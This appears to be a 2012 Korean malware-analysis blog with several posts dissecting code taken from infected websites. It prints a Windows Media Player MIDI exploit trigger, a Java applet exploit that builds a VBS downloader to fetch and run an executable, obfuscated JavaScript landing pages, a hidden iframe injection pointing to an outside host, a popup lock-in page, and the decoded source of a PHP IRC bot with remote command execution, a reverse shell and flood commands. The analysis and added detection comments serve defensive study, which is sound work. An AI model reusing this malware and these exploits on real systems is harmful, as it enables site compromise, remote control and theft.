posted by Kwan's 2012. 2. 25. 19:17

감염 사이트 : http://ad.tiad.co.kr/mt2.html
* 위 사이트는 현재도 감염중에 있습니다! 



메인 사이트 : http://ad.tiad.co.kr/mt2.htm0


Down.html MID 취약점 스크립트 !

<body>

<!-- Exploit trigger as captured from the infected page. The <object> instantiates
     the legacy Windows Media Player ActiveX control (CLSID
     22D6F312-B0F6-11D0-94AB-0080C74C7E95) at 1x1 pixels and points it at an
     attacker-supplied MIDI file (test_case.mid). AutoStart="True" makes the
     control load the file as soon as the page renders, so no user interaction is
     needed; the tiny size and the negative Volume keep it invisible and silent.
     Mitigation: keep Windows Media Player patched or set the kill-bit for this
     CLSID; this CLSID combined with a .mid fileName is a usable IDS/proxy signature. -->
<object ID="audio" WIDTH=1 HEIGHT=1 CLASSID="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95">

<!-- The MIDI file is the actual exploit payload; the other params only hide the player. -->
<param name="fileName" value="test_case.mid">

<param name="SendPlayStateChangeEvents" value="true">

<param NAME="AutoStart" value="True">

<param name="uiMode" value="mini">

<param name="Volume" value="-300">

</object>

</body>

</html>

 


눈에 띄는 것은 004.exe 중 Fucknaver.com 이라는 게 제일 눈에 띄었다 !

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)  http://fucknaver/    > nul   /c  del    \cmd.exe    }   -   wuapi.exe   stubpath    %SystemRoot%\system32\wuapi.exe onents  ve Setup\Installed Comp \Microsoft\Acti Software    " /f        reg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\     reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\    \wuapi.exe  Version SOFTWARE\Microsoft\Ole  .exe    http://www.naver.com/    -start start   http://japanddrk/   wininet.dll ADVAPI32.dll    RegSetValueExA  RegCloseKey RegQueryValueExA    InternetOpenA   InternetOpenUrlA    InternetCloseHandle HttpQueryInfoA  RegOpenKeyExA   RegDeleteKeyA   RegCreateKeyA   kernel32.dll    WinExec 

 
Applet.jar

.project , ScriptEngineExp.class , .classpath , MANIFEST.MF 파일이 포함되어 있다 !

그중 ScriptEngineExp.class 속에 !

 ScriptEngineExp.java javax/script/ScriptEngineManagerjs A Bdata C Djava/lang/StringBuilder Pvar error = new Error("My error");this.toString = function(){ java.lang.System.setSecurityManager(null);java.lang.Runtime.getRuntime().exec('cmd.exe /c echo URL = LCase(WScript.Arguments(0))>"%temp%\\happy.vbs"&&cmd.exe /c echo dim m,s>>"%temp%\\happy.vbs"&&cmd.exe /c echo m="M^i^c^r^o^s^o^f^t^.^X^M^L^H^T^T^P">>"%temp%\\happy.vbs"&&cmd.exe /c echo s="A=D=O=DB=.=S=t=r=e=a=m">>"%temp%\\happy.vbs"&&cmd.exe /c echo set cmd =Createobject(replace(m,"^","")) >>"%temp%\\happy.vbs"&&cmd.exe /c echo cmd.Open "GET",URL,0 >>"%temp%\\happy.vbs"&&cmd.exe /c echo cmd.Send()>>"%temp%\\happy.vbs"&&cmd.exe /c echo FileName=LCase(WScript.Arguments(1))>>"%temp%\\happy.vbs"&&cmd.exe /c echo Set CsCriptGet = Createobject(replace(s,"=",""))>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Mode=^3>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Type=^1>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Open()>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Write(cmd.responseBody)>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.SaveToFile FileName,^2>>"%temp%\\happy.vbs"&&cmd.exe /c cscript "%temp%\\happy.vbs"  E F+ "%temp%\\temp.exe"&& "%temp%\\temp.exe"');return "exploit!";};error.message = this; G H I J Kjavax/swing/JListjava/lang/Objecterror L K M N Ojavax/script/ScriptException P ScriptEngineExpjava/applet/AppletgetEngineByName/(Ljava/lang/String;)
Ljavax/script/ScriptEngine;getParameter&(Ljava/lang/String;)Ljava/lang/String;append-(Ljava/lang/String;)Ljava/lang/StringBuilder;toString()
Ljava/lang/String;javax/script/ScriptEngineeval&(Ljava/lang/String;)Ljava/lang/Object;get([Ljava/lang/Object;)Vadd*(Ljava/awt/Component;)Ljava/awt/Component;printStackTrace

 


posted by Kwan's 2012. 2. 10. 20:55
감염 사이트 : http://www.imslow.kr/ghost/index.html
* 악성 링크이니 조심하시기 바랍니다!


<script language="javascript">
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('143(58(46,41,40,45,43,44){43=58(40){65(40<41?\'\':43(153(40/41)))+((40=40%41)>35?92.166(40+29):40.169(36))};91(!\'\'.90(/^/,92)){93(40--){44[43(40)]=45[40]||43(40)}45=[58(43){65 44[43]}];43=58(){65\'\\\\57+\'};40=1};93(40--){91(45[40]){46=46.90(159 161(\'\\\\42\'+43(40)+\'\\\\42\',\'48\'),45[40])}}65 46}(\'133.98(88(88
생략


</script>
<script language="javascript">
// Swallows every runtime error on the page: returning true from window.onerror
// suppresses the browser's own error reporting. Combined with the packed script
// above, this keeps failed exploitation attempts silent for the victim; a
// page-wide onerror handler that does nothing but return true is itself a
// useful static indicator when triaging landing pages.
window.onerror=function(){ return true; }
</script>
<script language="JavaScript">
function decrypt(x){
       y="";
    for(i=0; i<x.length; i++){
    y += String.fromCharCode(x.charCodeAt(i)-3);
    }
    r="";
    for(i=y.length-1;i>=0;i--){
    r += y.substr(i,1);
    }
    return r;
}
mm = new Function(decrypt(unescape("%3E%2C%2C%2C%2C%25D38585%28H68585%28wslufv2F68585%28D38585%28G%3A8585%28E%3A8585%28%3C58585%28h%3B58585%28kfwdfG%3A8585%28%3C58585%28558585%2899%3B%3A%3B679%3A555%3A35713%3B3%3C%3C89584%3B9748%3B6136%3C7%3C%3A69%3C6%3A77%3A5%3B91385%3A%3B%3A596%3A373%3B34%3A138%3C5%3B5%3C37%3A%3B9%3A55%3B813558585%28%3B58585%28hwluz1%7Cgre1wqhpxfrgE%3A8585%28%7CuwD38585%28H68585%28558585%28wslufVdydM558585%28G68585%28hjdxjqdo358585%28wslufvF68585%28D38585%28H68585%28wslufv2F68585%28D38585%28G%3A8585%28E%3A8585%28%3C58585%28h%3B58585%28kfwdfG%3A8585%28%3C58585%28558585%28%3B%3A%
생략
3A8%3C613558585%28%3B58585%28hwluz1%7Cgre1wqhpxfrgE%3A8585%28%7CuwD38585%28H68585%28558585%28wslufVdydM558585%28G68585%28hjdxjqdo358585%28wslufvF68585%28%25+hsdfvhqx+hsdfvhqx+hsdfvhqx+hwluz1wqhpxfrg")));
mm();

각각의 출력이 다르다 !

1.

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1x.N(1e(1e
(생략)

2.

document.write(unescape(unescape("%253CHTML%253E%250D%250A%253CHEAD%253E%250D%250A%253CTITLE%253EHello%2520World%2520%253A%2529%2520Do%2520u%2520want%2520to%2520see%2520ghost%253F%2520%2528contact@imslow.kr%2529%253C/TITLE%253E%250D%250A%253CSCRIPT%2520language%253D%2522JavaScript%2522%253E%250D%250A%253C%
생략)));

두 함수 모두 결국은
 

<HTML>
<HEAD>
<TITLE>Hello World :) Do u want to see ghost? (contact@imslow.kr)</TITLE>
<SCRIPT language="JavaScript">
<!--
// try to maximize!
function maximizeWindow()
{
 // Moves the top window to the screen origin and tries to grow it to the full
 // available screen size: the `document.all` branch targets old IE, the other
 // branch assigns outerHeight/outerWidth directly. Any exception is swallowed.
 // Part of the page's lock-in behaviour (see try_open / set_DisableRight).
 try {
  top.window.moveTo(0,0);
  if (document.all) {
   top.window.resizeTo(screen.availWidth,screen.availHeight);
  }
  else if (document.layers||document.getElementById) {
   if (top.window.outerHeight<screen.availHeight||top.window.outerWidth<screen.availWidth){
    top.window.outerHeight = screen.availHeight;
    top.window.outerWidth = screen.availWidth;
   }
  }
 } catch(e) { }
}
maximizeWindow(); // runs immediately while the HEAD script is parsed

function eventIgnored()
{
 // Shared handler installed by set_DisableRight on contextmenu, dragstart and
 // selectstart: stops propagation and cancels the default action of the
 // implicit global `event` (if that global is undefined the ReferenceError is
 // swallowed by the try), then returns false so the browser drops the event.
 // Net effect: right-click, drag and text selection are blocked.
 try {
  if(event) {
   event.cancelBubble = true;
   event.returnValue = false;
  }
 } catch(e)
 { }
 return false;
}

function open_window()
{
 // Opens a copy of the current page in a new chromeless, full-screen window.
 // It is called repeatedly by try_open and twice from the BODY onunload
 // handler, so closing or leaving the page re-spawns it (popup loop).
 // NOTE(review): the feature string is split across two lines in this paste
 // ("loca" / "tion=no"); the original is a single string literal.
 // Modern popup blockers stop window.open calls that are not user-initiated.
 try {
  window.open(self.location, "_blank", "resizable=no,fullscreen=yes,toolbar=no,menubar=no,status=no,titlebar=no,loca
tion=no,directories=no");
 } catch(e) { }
}

function try_open()
{
 // Opens a window and then re-schedules itself every 2 s, i.e. an unbounded
 // popup loop for as long as the page stays open. First armed by the
 // setTimeout(try_open, 2000) after the function definitions.
 try {
  open_window();
  setTimeout(try_open, 2000);
 } catch(e) { }
}

function set_DisableRight()
{
 // Installs eventIgnored on the document's contextmenu/dragstart/selectstart
 // events and re-installs it every 100 ms, so attempts (by the user or an
 // extension) to restore the handlers are undone almost immediately.
 try {
  document.oncontextmenu = eventIgnored;
  document.ondragstart = eventIgnored;
  document.onselectstart = eventIgnored;
  setTimeout(set_DisableRight, 100);
 } catch(e)
 { }
}

function fm() {
 // Builds and document.write()s an <object>/<embed> pair that embeds ghost.swf
 // (Flash Player CLSID d27cdb6e-ae6d-11cf-96b8-444553540000) at 100% x 100%.
 // swliveconnect="true" lets the movie call back into page JavaScript. This is
 // the component the Flash-related comments on the page refer to; the SWF
 // itself is not shown here, so its behaviour cannot be stated from this code.
 // NOTE(review): the codebase attribute (lines 'codebase="' ... 'pub/...') was
 // split by the blog's auto-linker; in the original it is one string literal.
 var s = "";
 s += '<object type="application/x-shockwave-flash" ';
 s += 'classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" ';
 s += 'codebase="
http://fpdownload.macromedia.com
 s += 'pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0"';
 s += 'id="ghostmovie" width="100%" height="100%">';
 s += '<param name="movie" value="ghost.swf">';
 s += '<param name="quality" value="high">'; 
 s += '<param name="menu" value="false">';
 s += '<param name="swliveconnect" value="true">';
 s += '<param name="scale" value="exactFit">';
 s += '<embed src="ghost.swf" quality="high" menu="false" ';
 s += 'width="100%" height="100%" swliveconnect="true" scale="exactFit" ';
 s += 'id="ghostmovie" name="ghostmovie" type="application/x-shockwave-flash" ';
 s += 'pluginspage="http://www.macromedia.com/go/getflashplayer"><\/embed>';
 s += '<\/object>';
 document.write(s);
}
// Arm the popup loop (every 2 s) and the handler re-installer (every 100 ms);
// both functions re-schedule themselves, so these timers never stop.
setTimeout(try_open, 2000);
setTimeout(set_DisableRight, 100);
// -->
</SCRIPT>
</HEAD>
<BODY bgcolor=white onload="document.bgColor='black'" onunload="open_window();open_window();alert('Gotcha!\tHey man :)');" onmousedown="if(event.button==2){alert("Gotcha!");}" leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 oncontextmenu="return false" ondragstart="return false" onselectstart="return false" unselectable="on" style="cursor: default;">
<SCRIPT language="JavaScript">
 fm();
</SCRIPT>
</BODY>
</HTML>

clsid:d27cdb6e-ae6d-11cf-96b8-444553540000

clsid:d27cdb6e-ae6d-11cf-96b8-444553540000

{D27CDB6E-AE6D-11CF-96B8-444553540000}

Updated: March 28, 2003

Applies To: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\AllowedControls

Description

Stores configuration data for the policy setting Shockwave Flash.

Change Method

To change the value of this entry, use the Group Policy Object Editor (Gpedit.msc). The corresponding policy is located in \Windows Components\Internet Explorer\Administrator Approved Controls.


  1. 벌새 2012.02.10 21:21 신고  Addr  Edit/Del  Reply

    한 마디로 flash 취약점이군요.

    • Kwan's 2012.02.11 12:24 신고  Addr  Edit/Del

      너무 글이 길었나봐요 ㅠㅠㅠㅠ
      그냥 딱 한마디로 정리할껄 그랬어요 ㅠㅠㅠㅠ

  2. ray 2012.02.12 22:59  Addr  Edit/Del  Reply

    ghost.swf 파일의 내용은 무엇인지요~?

posted by Kwan's 2012. 1. 29. 14:59

메인 스크립트중 ! 이상한 스크립트 발견 !

// Two-stage string decoder followed by document.write of the decoded markup.
// c102916999516m494180f401f90(s) is parseInt(s, 16); m494180f403ed1(s) walks the
// string two characters at a time and turns each hex pair into a character, so the
// long '3C7'+z0f+'3637'+... literal is hex-encoded HTML/script (z0f is the empty
// string, so the '+z0f+' splits are pure noise: the first bytes decode to
// "<script>if(!m", matching the injected snippet shown below). The literal is
// truncated in this paste ([생략]), so the block cannot run as shown; decode the
// hex offline rather than executing it.
function c102916999516m494180f401f90(m494180f40275f){ var m494180f402f30=16; return (parseInt(m494180f40275f,m494180f402f30));}function m494180f403ed1(m494180f4046a2){ function m494180f405e13(){return 2;} var m494180f404e72='';m494180f406db4=String.fromCharCode;for(m494180f405643=0;m494180f405643<m494180f4046a2.length;m494180f405643+=m494180f405e13()){ m494180f404e72+=(m494180f406db4(c102916999516m494180f401f90(m494180f4046a2.substr(m494180f405643,m494180f405e13()))));}return m494180f404e72;} var z0f='';var m494180f407587='3C7'+z0f+'3637'+z0f+'2697'+z0f+'07'+z0f+'43E696628216D7'+z0f+'
[생략]'
34253638253364253334253337'+z0f+'253330253230253638253635253639253637'+z0f+'2536382537'
+z0f+'34253364253334253334253337'+z0f+'2532302537'+z0f+'332537'+z0f+'342537'+z0f+'3925366
3253635253364253237'+z0f+'2536342536392537'+z0f+'332537'+z0f+'302536632536312537'+z0f+'39
253361253230253665253666253665253635253237'+z0f+'2533652533632532662536392536362537'+z
0f+'3225363125366425363525336527'+z0f+'29293B7'+z0f+'D7'+z0f+'6617'+z0f+'2206D7'+z0f+'
969613D7'+z0f+'47'+z0f+'27'+z0f+'5653B3C2F7'+z0f+'3637'+z0f+'2697'+z0f+'07'+z0f+'43E';
document.write(m494180f403ed1(m494180f407587));

<script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f[생략]69%67%68%74%3d%31%31%35%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>

// Decoded form of the injected one-liner above: if the page-level flag `myia` is
// not yet set, write a hidden (display:none, 429x115) iframe named c10 that loads
// http://gogo2me.net/.go/check.html with a random cache-busting query value, then
// set `myia` so the iframe is injected only once per page. This line appears to be
// the author's rendering of the unescape() result, which is why the inner quotes
// are not escaped. The hidden iframe URL is the indicator to look for in traffic.
if(!myia){document.write(unescape( '<iframe name=c10 src='http://gogo2me.net/.go/check.html?'+Math.round(Math.random()*49335)+'c3d' width=429 height=115 style='display: none'></iframe>'));}var myia=true;

현재 페이지는 !


=========================
Server IP(s):
0.0.0.0
=========================
HTTP headers:

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 29 Jan 2012 05:56:49 GMT
Connection: close
Content-Length: 1245


posted by Kwan's 2012. 1. 23. 23:35

File : input.jpg
MD5 : 7e3a6b9991f49fafe5e3b9c0ef8c8d1b
크기 : 5.93KB (6,079 바이트)
감염 사이트 : http://www.mhouse.or.kr//bbs/admin/input.jxg
Kaspersky : Backdoor.PHP.Pbot.bl
VirusTotal : 바이러스토탈결과


<?
// Loader stage of the sample served as "input.jpg": the image name disguises a
// PHP script. It lifts the execution time limit (the bot below runs forever),
// silences all error output, prints "ok!" (a marker the operator can check over
// HTTP), then runs a base64 + gzinflate encoded blob through eval(). The '@'
// suppresses any warning from the decode, so a failure leaves nothing in the
// logs. Detection: the eval(gzinflate(base64_decode( chain together with
// error_reporting(0) is a classic web-shell signature worth grepping for in the
// web root. The decoded payload (the pBot IRC bot) is reproduced below.
set_time_limit(0);
error_reporting(0);
echo "ok!";

$code = "7Txpc9rItp/9qt5/aOtSY5QQLMB4xjj2HUywLTvGMRi8xBQlpAY
+9R+BRGne7l7V+FwMMsQR0nDUcoLleLavXH0vi2wvVp9/FE25z0AD5kk
/k8bbauLirNkRXXmAr7dyJ2ia9W0g8ob9oiV/2BnWhUWv0GzWR9Kc2/Xh3
1cVjefgAdH7MVfSLnNC9GGfIwz08j4sO2JN8VRK7uFQUPPwqPlOFyw/F
ZXyXH+6r4I89oPrZce3/6IibvmIPwYyhRcMsvfiX5OjSHedfQ5zeEKPN6HpeC[생략]
z8Ty7bcZrsKfZUozZm/wdxFJVo/XB5Y+mPDkjskBVqwTZhpahOI9W3Jwvt7
LQXL9EzHLFoFjhVPz99xBjZVNIPK7mixcId+C0CPJNAbDWYJeojtRdkMJTOu
fLymkTKaq1sip3CrTcoqBHmVvOaJDclsQUTpGLKJEMmLkti4AOLwHcku+4
J/JmwZJkGvmhwhDY/YC3jp+E6LZms+/wc=";

@eval(gzinflate(base64_decode($code)));

eval gzinflate base64_decode Online Decode Tool

 // IRC-controlled PHP bot ("pBot") recovered from the eval/gzinflate loader
 // above. Once started it holds an IRC connection, announces the compromised
 // site to a channel, and lets operators who authenticate with the configured
 // password run PHP (eval), OS commands (exec/sexec/passthru/popen/system),
 // fetch files, open a reverse shell (conback) and launch UDP/TCP floods.
 // The comments describe observed behaviour for analysts; the code is the
 // decoded sample as pasted (several long lines are folded and the embedded
 // base64 blob in conback() is truncated with [생략]).
 class pBot
 {
   // C2 configuration. The original file has one key per line; the paste folded
   // them onto one line, so as shown everything after the first "//" is a comment.
   // Keys (Portuguese inline notes translated): server/port/pass = IRC host, port
   // and server password; prefix = nick base; maxrand = number of random digits
   // appended to the nick; chan/key = channel and channel key to join; chan2 =
   // channel the bot reports the compromised URL to on connect; modes = user
   // modes; password = operator password checked by ".masuk"; trigger = command
   // prefix; hostauth = hostmask required of operators ("*" = any hostname).
   var $config = array("server"=>"irc.plasa.com",  // ip/host da rede                     "port"=>"6667",   // porta da rede                     "pass"=>"**",   // senha da rede                     "prefix"=>"Justice",   // nick do bot                     "maxrand"=>"5",   // quantidade de numero no nick do bot                     "chan"=>"#007",   // canal que os bots vao entrar                     "chan2"=>"#007",  // canal aonde os bots v?o mandar as vulns ao conectar (-n)                     "key"=>"rakitan",      // senha do canal                     "modes"=>"+p",              // modos do bot                     "password"=>"**",           // senha pra acesso (.user SENHA)                     "trigger"=>".",   // prefico dos comandos                     "hostauth"=>"Experience.Is.The.Best.Teacher"   // host dos owners (* for any hostname)                     );
   // host prefix => true for every operator currently logged in via ".masuk".
   var $users = array();
   // Connect to the C2 server (calling itself again while fsockopen fails),
   // register with prefix + maxrand random digits as ident and php_uname() as
   // the real-name field, pick a nick and enter the command loop.
   function start()
   {
     if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))        $this->start();
     $ident = $this->config['prefix'];
     $alph = range("0","9");
     for($i=0;$i<$this->config['maxrand'];$i++)        $ident .= $alph[rand(0,9)];
     if(strlen($this->config['pass'])>0)        $this->send("PASS ".$this->config['pass']);
     $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
     $this->set_nick();
     $this->main();
   }
   // Command loop: reads the IRC socket line by line until EOF, then reconnects
   // through start(). Everything the operators can do is dispatched from here.
   function main()
   {
     while(!feof($this->conn))
     {
       $this->buf = trim(fgets($this->conn,512));
       $cmd = explode(" ",$this->buf);
       // Keep-alive.
       if(substr($this->buf,0,6)=="PING :")
       {
         $this->send("PONG :".substr($this->buf,6));
       }
       // 001 = registration complete: set user modes, join the channel and post
       // uname, safe_mode state and the compromised URL (SERVER_NAME +
       // REQUEST_URI) to chan2. This "Vuln:" announcement is how the operators
       // learn which site the bot runs on.
       if(isset($cmd[1]) && $cmd[1] =="001")
       {
         $this->send("MODE ".$this->nick." ".$this->config['modes']);
         $this->join($this->config['chan'],$this->config['key']);
         if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
         {
           $safemode = "ON";
         }
         else
         {
           $safemode = "OFF";
         }
         $uname = php_uname();
         $this->privmsg($this->config['chan2'],"uname: $uname (Safe: $safemode)");
         $this->privmsg($this->config['chan2'],"Vuln :
http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI'."");
       }
       // 433 = nick already in use.
       if(isset($cmd[1]) && $cmd[1]=="433")
       {
         $this->set_nick();
       }
       // Parse the sender (nick!user@host) and the message words; when the
       // message is addressed to the bot's nick the nick is stripped first.
       if($this->buf != $old_buf)
       {
         $mcmd = array();
         $msg = substr(strstr($this->buf," :"),2);
         $msgcmd = explode(" ",$msg);
         $nick = explode("!",$cmd[0]);
         $vhost = explode("@",$nick[1]);
         $vhost = $vhost[1];
         $nick = substr($nick[0],1);
         $host = $cmd[0];
         if($msgcmd[0]==$this->nick)
         {
           for($i=0;$i<count($msgcmd);
           $i++)               $mcmd[$i] = $msgcmd[$i+1];
         }
         else
         {
           for($i=0;$i<count($msgcmd);
           $i++)               $mcmd[$i] = $msgcmd[$i];
         }
         if(count($cmd)>2)
         {
           switch($cmd[1])
           {
             // Operators are logged out when they leave the network or channel.
             case "QUIT":                    if($this->is_logged_in($host))
             {
               $this->log_out($host);
             }
             break;
             case "PART":                    if($this->is_logged_in($host))
             {
               $this->log_out($host);
             }
             break;
             // Unauthenticated senders may only run ".masuk <password>", and only
             // from the hostauth hostmask ("*" accepts any host).
             case "PRIVMSG":                    if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
             {
               if(substr($mcmd[0],0,1)==".")
               {
                 switch(substr($mcmd[0],1))
                 {
                   case "masuk":                               if($mcmd[1]==$this->config['password'])
                   {
                     $this->log_in($host);
                   }
                   else
                   {
                     $this->notice($this->config['chan'],"[\2Auth\2]: Tahede Ngana $nick GOBLOK!!");
                   }
                   break;
                 }
               }
             }
             // Operator command set; every command starts with ".".
             elseif($this->is_logged_in($host))
             {
               if(substr($mcmd[0],0,1)==".")
               {
                 switch(substr($mcmd[0],1))
                 {
                   // Drop the connection and reconnect.
                   case "restart":                                $this->send("QUIT :restart commando from $nick");
                   fclose($this->conn);
                   $this->start();
                   break;
                   // Send e-mail through the host's mail() with a forged From header.
                   case "mail": //mail to from subject message                                if(count($mcmd)>4)
                   {
                     $header = "From: <".$mcmd[2].">";
                     if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
                     {
                       $this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
                     }
                     else
                     {
                       $this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
                     }
                   }
                   break;
                   // Report safe_mode state.
                   case "safe":                               if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
                   {
                     $safemode = "on";
                   }
                   else
                   {
                     $safemode = "off";
                   }
                   $this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
                   break;
                   // Test e-mail carrying uname, server software, the host's resolved
                   // IP and the compromised URL to an operator-chosen address.
                   case "inbox": //teste inbox                               if(isset($mcmd[1]))
                   {
                     $token = md5(uniqid(rand(), true));
                     $header = "From: <inbox".$token."@xdevil.org>";
                     $a = php_uname();
                     $b = getenv("SERVER_SOFTWARE");
                     $c = gethostbyname($_SERVER["HTTP_HOST"]);
                     if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln:
http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
                     {
                       $this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
                     }
                     else
                     {
                       $this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
                     }
                   }
                   break;
                   // Reverse shell to operator ip:port; see conback() below.
                   case "conback":                               if(count($mcmd)>2)
                   {
                     $this->conback($mcmd[1],$mcmd[2]);
                   }
                   break;
                   // Forward or reverse DNS lookup from the compromised host.
                   case "dns":                                if(isset($mcmd[1]))
                   {
                     $ip = explode(".",$mcmd[1]);
                     if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
                     {
                       $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
                     }
                     else
                     {
                       $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
                     }
                   }
                   break;
                   // Re-post uname, safe_mode and the compromised URL.
                   case "info":                            case "vunl":                               if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
                   {
                     $safemode = "on";
                   }
                   else
                   {
                     $safemode = "off";
                   }
                   $uname = php_uname();
                   $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
                   $this->privmsg($this->config['chan'],"[\2vuln\2]:
http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
                   break;
                   // Version banner (useful string for signatures).
                   case "bot":                               $this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; prekelz");
                   break;
                   case "uname":                               if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
                   {
                     $safemode = "on";
                   }
                   else
                   {
                     $safemode = "off";
                   }
                   $uname = php_uname();
                   $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
                   break;
                   case "rndnick":                                $this->set_nick();
                   break;
                   // Write an arbitrary raw line to the IRC socket.
                   case "raw":                               $this->send(strstr($msg,$mcmd[1]));
                   break;
                   // Evaluate arbitrary PHP from the message: full code execution.
                   case "eval":                              $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
                   break;
                   // OS command execution via five different PHP primitives
                   // (shell_exec, exec, passthru, popen, system), so at least one
                   // is likely to survive a partial disable_functions setting.
                   // Output is relayed to the channel line by line. The command
                   // runs as the web-server user; look for shells spawned by it.
                   case "sexec":                               $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                   $exec = shell_exec($command);
                   $ret = explode("\n",$exec);
                   for($i=0;$i<count($ret);
                   $i++)                                   if($ret[$i]!=NULL)                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
                   break;
                   case "exec":                                $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                   $exec = exec($command);
                   $ret = explode("\n",$exec);
                   for($i=0;$i<count($ret);
                   $i++)                                   if($ret[$i]!=NULL)                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
                   break;
                   case "passthru":                                $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                   $exec = passthru($command);
                   $ret = explode("\n",$exec);
                   for($i=0;$i<count($ret);
                   $i++)                                   if($ret[$i]!=NULL)                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
                   break;
                   case "popen":                                if(isset($mcmd[1]))
                   {
                     $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                     $this->privmsg($this->config['chan'],"[\2popen\2]: $command");
                     $pipe = popen($command,"r");
                     while(!feof($pipe))
                     {
                       $pbuf = trim(fgets($pipe,512));
                       if($pbuf != NULL)                                         $this->privmsg($this->config['chan'],"     : $pbuf");
                     }
                     pclose($pipe);
                   }
                   case "system":                                $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                   $exec = system($command);
                   $ret = explode("\n",$exec);
                   for($i=0;$i<count($ret);
                   $i++)                                   if($ret[$i]!=NULL)                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
                   break;
                   // TCP connect probe of host:port from the compromised server.
                   case "pscan": // .pscan 127.0.0.1 6667                                if(count($mcmd) > 2)
                   {
                     if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))                                      $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
                     else                                      $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
                   }
                   break;
                   // Switch the C2 server/port (and server password) at runtime,
                   // so the configured server is not the only C2 indicator.
                   case "ud.server": // .ud.server <server> <port> [password]                                if(count($mcmd)>2)
                   {
                     $this->config['server'] = $mcmd[1];
                     $this->config['port'] = $mcmd[2];
                     if(isset($mcmcd[3]))
                     {
                       $this->config['pass'] = $mcmd[3];
                       $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
                     }
                     else
                     {
                       $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
                     }
                   }
                   break;
                   // Fetch a URL with file() and write it to a local path.
